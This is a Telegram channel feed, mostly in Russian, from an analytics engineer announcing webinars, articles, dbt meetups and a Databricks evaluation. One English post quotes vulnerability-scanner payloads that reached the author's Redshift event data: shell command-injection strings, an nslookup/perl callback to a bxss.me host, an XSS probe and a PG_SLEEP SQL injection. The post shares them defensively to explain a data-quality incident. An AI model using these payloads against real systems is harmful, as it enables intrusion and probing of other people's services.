Data Apps Design

Мы могли бы долго и нудно обсуждать, кто такой Analytics (Data / Backend) Engineer, какими инструментами он должен владеть, какие buzzwords в тренде и ценятся в CV, однако, на мой взгляд, гораздо интереснее рассмотреть процесс и результаты его деятельности в рамках конкретной прикладной задачи.

В этой публикации:

— Что значит решение End-to-End и в чем его ценность?
— Организация Extract & Load данных из асинхронного API MaestroQA
— Моделирование витрин данных с помощью dbt
— Поставка ценности для пользователей с помощью Looker

Читать на Хабр →

#pipelines #ELT #dwh #modeling #bi

Хабр

Кто такой Analytics Engineer – E2E-решение с использованием bash + dbt + Looker

Привет! Меня зовут Артемий Козырь, и я Analytics Engineer в Wheely. Мы могли бы долго и нудно обсуждать, кто такой Analytics ( Data / Backend ) Engineer, какими инструментами он должен владеть, какие...

613 viewsArtemiy Kzr, 09:03

Data Apps Design

Одна из самых важных идей заключается в том, что заказчик, кем бы он ни был (Manager, Product Owner, CEO), почти никогда не ставит задачу в инженерных терминах:

— Налить 100500 гигабайт в Хранилище
— Добавить multithreading в код
— Написать супероптимальный запрос
— Создать 15 dbt-моделей

За любой инженерной задачей стоит решение конкретных бизнес-проблем. Для нас это:

— Прозрачность Customer Support (фиксируем все оценки, инциденты)
— Результативность на ладони (отслеживаем динамику показателей во времени)
— Отчитываемся о KPI команд поддержки (агрегирующие показатели по командам, городам, странам и т.д.)
— Получаем обратную связь и исправляем ошибки (идентификация слабых/проблемных мест и быстрый feedback)
— Постоянно учимся и разбираем кейсы (категоризация тем, организация тренингов и разборов)

И это ключевой фокус, который отличает Analytics Engineer от, например, классических Data Engineer, Backend Engineer.

673 viewsArtemiy Kzr, edited 09:08

Data Apps Design

[RU] Вебинар – End-to-End решение для аналитики на примере источника MaestroQA

– Extract-Load через API-вызовы и автоматизация в Airflow
– Трансформация данных с dbt: обогащение, дедупликация, суррогатные ключи, приведение типов
– Моделирование метрик в Looker BI: слой доступа, визуализация, drill-down

Слайды вебинара: https://docs.google.com/presentation/d/1K72UiPjy1ljVRKieLPQdeilC75zZ2N4QszH_XKhR3kM/edit?usp=sharing

🌐 @data_apps | Навигация по каналу

Please open Telegram to view this post

VIEW IN TELEGRAM

YouTube

End-to-end решение для аналитики на примере источника MaestroQA // курс «Data Warehouse Analyst»

На занятии разберем:

- Extract-Load через API-вызовы и автоматизация в Airflow
- Трансформация данных с dbt: обогащение, дедупликация, суррогатные ключи, приведение типов
- Моделирование метрик в Looker BI: слой доступа, визуализация, drill-down

«Data Warehouse…

618 viewsArtemiy Kzr, edited 11:37

Data Apps Design

Привет! Сегодня и завтра 23-24 мая в 20.00 приглашаю на вебинар из 2-х частей (интенсив).

Extract - Load как сервис и как собственное решение. Поиск баланса и дзен

– SaaS решения и их ограничения
– Выгрузки через API-вызовы – оптимальные способы реализации
– Гибридные подходы
– Автоматизация выгрузки, retries, notifications с помощью Airflow
– Накопление истории и организация Data Lake в S3 перед DWH

Рассмотрим опыт построения production pipelines, взвесим плюсы и минусы, сделаем выводы.

Ссылка на регистрацию: https://otus.ru/lessons/data-engineer/#event-2024
Ссылка на YouTube-трансляцию будет опубликована здесь за 5 минут до начала.

🌐 @data_apps | Навигация по каналу

Please open Telegram to view this post

VIEW IN TELEGRAM

631 viewsArtemiy Kzr, edited 11:12

Data Apps Design

Привет! Сегодня и завтра 23-24 мая в 20.00 приглашаю на вебинар из 2-х частей (интенсив). Extract - Load как сервис и как собственное решение. Поиск баланса и дзен – SaaS решения и их ограничения – Выгрузки через API-вызовы – оптимальные способы реализации…

Запустил трансляцию, присоединяйтесь!
https://www.youtube.com/watch?v=AN__n3xefv8

YouTube

Демо-занятие курса «Data Engineer». День 1

Extract - Load с помощью SaaS-сервиса vs. Cобственное решение. Поиск баланса и дзен.

– Extract-Load через SaaS решения. Возможности готовых сервисов, их надежность и ограничения
– Extract-Load через API-вызовы, обращения к СУБД и CDC – оптимальные способы…

665 viewsArtemiy Kzr, 17:01

Data Apps Design

Привет! Сегодня продолжаем – 2 часть вебинара:

Extract - Load как сервис и как собственное решение. Поиск баланса и дзен

– 1. In-house EL + LIVE MaestroQA + Airflow
– 2. Гибридные подходы + LIVE Airbyte
– 3. Жизнь после EL – Transform & Deliver – dbt + Looker

Опыт production pipelines, взвесим, сравним плюсы и минусы.

Ссылка на YouTube-трансляцию: https://youtu.be/hoqM7gfqQNg

830 viewsArtemiy Kzr, edited 17:01

Data Apps Design

Привет! Сегодня продолжаем – 2 часть вебинара: Extract - Load как сервис и как собственное решение. Поиск баланса и дзен – 1. In-house EL + LIVE MaestroQA + Airflow – 2. Гибридные подходы + LIVE Airbyte – 3. Жизнь после EL – Transform & Deliver – dbt + Looker…

Посмотреть слайды обоих дней можно по ссылке:
https://docs.google.com/presentation/d/1S3H02t8plk_XbZVKvWfWy6ZY36QTPO3FDbZMeYO4n9U/edit?usp=sharing

Google Docs

DE Intensive – Extract - Load как сервис и как собственное решение

Онлайн образование otus.ru

969 viewsArtemiy Kzr, 18:48

Data Apps Design

0:32

This media is not supported in your browser

VIEW IN TELEGRAM

Жизнь на болотах
Или когда лягушки активизируются во время вебинара

#humor

844 viewsArtemiy Kzr, 18:56

Data Apps Design

Во вторник 14 июня в 19.00 в рамках развития сообщества @dbt_users будет проведен второй митап, посвященный инструменту dbt.

Интереснейшие доклады ребят из Wheely, ADV/web-engineering co., Space307 и NabuMinds:

– dbt + Clickhouse: кластер, версионирование данных и другие сложности реализации
– Data Quality в Modern Data Stack
– Зрелость dbt-проекта. Есть, куда расти?
– dbt в etl-командах: снимаем типовые боли байтовозов

Слоты фиксированы по времени, можно подключаться на любой доклад. После каждого доклада есть время на вопросы-ответы и общение.

Ссылка на ютуб придет как обычно перед началом митапа. До встречи 😉

https://space307.team/dbtmeetup

759 viewsArtemiy Kzr, 16:43

Data Apps Design

Мой доклад стартует в 19.05:

Зрелость DBT-проекта. Есть, куда расти?

– К чему стремимся, используя dbt?
– Матрица зрелости dbt-проекта
– Кейс Wheely + dbt
– Что дальше и как это использовать у себя

795 viewsArtemiy Kzr, 16:45

Data Apps Design

Во вторник 14 июня в 19.00 в рамках развития сообщества @dbt_users будет проведен второй митап, посвященный инструменту dbt. Интереснейшие доклады ребят из Wheely, ADV/web-engineering co., Space307 и NabuMinds: – dbt + Clickhouse: кластер, версионирование…

Начинаем, подключайтесь:
https://www.youtube.com/watch?v=AxXv-988B1A

YouTube

Dbt Meetup 2022-06-14

Митап для специалистов, использующих инструмент dbt для решения своих задач.

Таймкоды:

00:00 Приветствие
1:53–32:35 Артемий Козырь, Analytics engineer at Wheely — Зрелость DBT-проекта. Есть, куда расти?
36:05–59:45 Никита Баканчев, Senior data engineer…

963 viewsArtemiy Kzr, 16:00

Data Apps Design

Слайды моего доклада с [dbt meetup]

Зрелость DBT-проекта. Есть, куда расти?

– К чему стремимся, используя dbt?
– Матрица зрелости dbt-проекта
– Кейс Wheely + dbt
– Что дальше и как это использовать у себя

#meetup

🌐 @data_apps | Навигация по каналу

Please open Telegram to view this post

VIEW IN TELEGRAM

Google Docs

[dbt meetup] 2022-06-14 Зрелость dbt-проекта

Зрелость dbt-проекта Есть, куда расти?

1.46K viewsArtemiy Kzr, edited 17:28

Data Apps Design

A very useful and handy implementation of Load step from ELT acronym.

Use this example to build your own Extract - Load solution and take into account all the possible outcomes and issues you may face in advance:

– Handling duplicate rows (even when uniqueness constraint is not enforced)
– Coping with DELETEs on source side (hard deletes)
– Allowing data inspection and time travel with metadata attributes
– Examples for Amazon Redshift, Google BigQuery, Snowflake

https://docs.hevodata.com/data-loading/loading-data-to-warehouse/

#elt #pipelines

1.01K viewsArtemiy Kzr, 13:18

Data Apps Design

Сегодня хотел бы поговорить о широко распространенной СУБД Greenplum и, в частности, о Platform Extension Framework (PXF) - расширении, с помощью которого открываются почти неограниченные возможности интеграции с множеством внешних систем и форматов данных.

В этой публикации Вас ждет:

– Основные возможности PXF, конфигурация, способы оптимизации.
– Организация Extract - Load с помощью PXF (Data Lake / OLTP).
– Объединение локальных и внешних таблиц в запросах (Federated queries).
– Запись данных во внешние системы (Clickhouse).

Читать на Хабр →

#pipelines #ELT #dwh #greenplum #pxf

Хабр

Сценарии применения Greenplum PXF для интеграции с Data Lake, OLTP, Clickhouse

Привет! Меня зовут Артемий Козырь, и я Analytics Engineer в Wheely. Популярность массивно-параллельных СУБД ( MPP ) для решения аналитических задач неукоснительно растет. Сегодня хотел бы...

1.11K viewsArtemiy Kzr, 10:03

Data Apps Design

Ух, как же много материала, которым хочется поделиться.

Не всё успеваю публиковать. Подал заявку на доклад на конфе SmartData

Будете ждать? 🤔

982 viewsArtemiy Kzr, 13:34

Data Apps Design

Somebody is overwhelming our analytics trying to find security breaches.

A brief infrastructure setup: we gather user events data in mobile apps (iOS, Android) and Web via Snowplow trackers, send it to Kafka queues, then land the data into DWH (Redshift) staging area.

Looks like a vulnerability scanner is used. Take a look at the sample data:

echo bvazvs$()\ igzdlg\nz^xyu||a #' &echo bvazvs$()\ igzdlg\nz^xyu||a #|" &echo bvazvs$()\ igzdlg\nz^xyu||a #
bxss.me/t/xss.html?%00
`(nslookup hitxbheyywgyq5e37d.bxss.me||perl -e "gethostbyname('hitxbheyywgyq5e37d.bxss.me')")`
aUV52Y1o' OR 826=(SELECT 826 FROM PG_SLEEP(15))--
^(#$!@#$)(()))******

Despite basic checks are enforced (non-empty string, valid json), around 1k events managed to get into DWH 😐

What I've done so far:

1. Filtered out and deleted problem rows from database
2. Enforced data type checks

Curious case. Finally I have faced with tech pirates 😵‍💫

Let's see if it works fine. Any other ideas?

780 viewsArtemiy Kzr, edited 10:22

Data Apps Design

811 viewsArtemiy Kzr, 10:24

Data Apps Design

Ух, как же много материала, которым хочется поделиться. Не всё успеваю публиковать. Подал заявку на доклад на конфе SmartData Будете ждать? 🤔

Получил отказ

"Немного деталей, которые повлияли на наше решение:
То что вы применяете бест практики из разработки - это отлично, но для нашей конференции в докладе все же не хватает технического наполнения. Возможно, это потому что мы нацелины больше на инженеров, которые уже очень хорошо знакомы со системой контроля версий, CI/CD и вот это вот все. Нам кажется, что для нашей целевой аудитории доклад не будет иметь прикладной полезности."

Технические детали это: "Я говорила про различные вариации b-tree в движках, как пример того, насколько глубокие технические подробности нам интересны"

B-tree в аналитических СУБД и больших данных в 2022... Бугага 😂

Есть идеи, на какой RU конфе готовы слушать про Modern Data Stack / Analytics Engineering?
Про Сoalesce в курсе, но в этом году уже поздно.

Getdbt

Coalesce Conference | Crafted by dbt Labs

Join dbt Labs and thousands of analytics professionals at our premier data conference, Coalesce.

968 viewsArtemiy Kzr, 16:22

Data Apps Design

Databricks + Wheely Proof of Concept

I will be assessing Databricks as our new data platform (to succeed AWS Redshift)

– Requirements to E - L - T
– Current setup description
– Proof of Concept plan

Desired business impact:

– Cost effective (at least compared to what we currently spend on AWS Redshift reserved flat rate)
– Performance gains desired
– Extended features support (H3, in-database ML, Advanced analytics, ...)
– Access to ecosystem (docs, solutions, code examples, how-to guides)
– Democratization of access to data and data-related services: built-in Notebook experience
– No degradation (performance, outage, timeouts, job failures) in comparison with current state

🌐 @data_apps | Навигация по каналу

Please open Telegram to view this post

VIEW IN TELEGRAM

Gist

Databricks + Wheely Proof of Concept

Databricks + Wheely Proof of Concept. GitHub Gist: instantly share code, notes, and snippets.

👍11😍1

6.69K viewsArtemiy Kzr, edited 15:17

Data Apps Design

Databricks + Wheely Proof of Concept I will be assessing Databricks as our new data platform (to succeed AWS Redshift) – Requirements to E - L - T – Current setup description – Proof of Concept plan Desired business impact: – Cost effective (at least…

❓ Very interesting. But what lacks in AWS Redshift?

AWS Redshift is really good. However
– Sometimes it seems to lack certain features (read GeoJSON, index geo data via H3 lib).
– It takes ~10 seconds to parse any query for the first time.
– I've faced with a couple of internal bugs (no. much affecting workloads, but still).
– I want to explore if I can save some costs if I use serverless solutions (pay as much as you have consumed compute resources).
– Using OSS formats like Parquet / Delta files might be beneficial

And I want to trial something else 😃🤔

👍4❤2😁1🤔1

872 viewsArtemiy Kzr, 13:15

Data Apps Design

26 октября (среда) в 20:00 проведу вебинар:

Работа с ГЕО-данными в DWH: координаты, зоны, агрегация

– Привязка событий к зонам на карте города
– Агрегирование и аналитика данных с помощью H3 (гексагоны)
– Оптмизация расчетов и производительности, кэширование

Расскажу подробно, как это устроено в проекте Wheely, над которым я работаю.
Как и зачем индексировать данные (например, с использованием библиотеки H3 от Uber).
Выполнение гео-операций, проверка вхождения точки в конкретные зоны (аэропорты, вокзалы, ТЦ, районы города).

⬇️ Ссылка на YouTube-трансляцию будет в этом канале

🌐 @data_apps | Навигация по каналу

Please open Telegram to view this post

VIEW IN TELEGRAM

👍10🔥6

1.4K viewsArtemiy Kzr, edited 07:48

About

Blog

Apps

Platform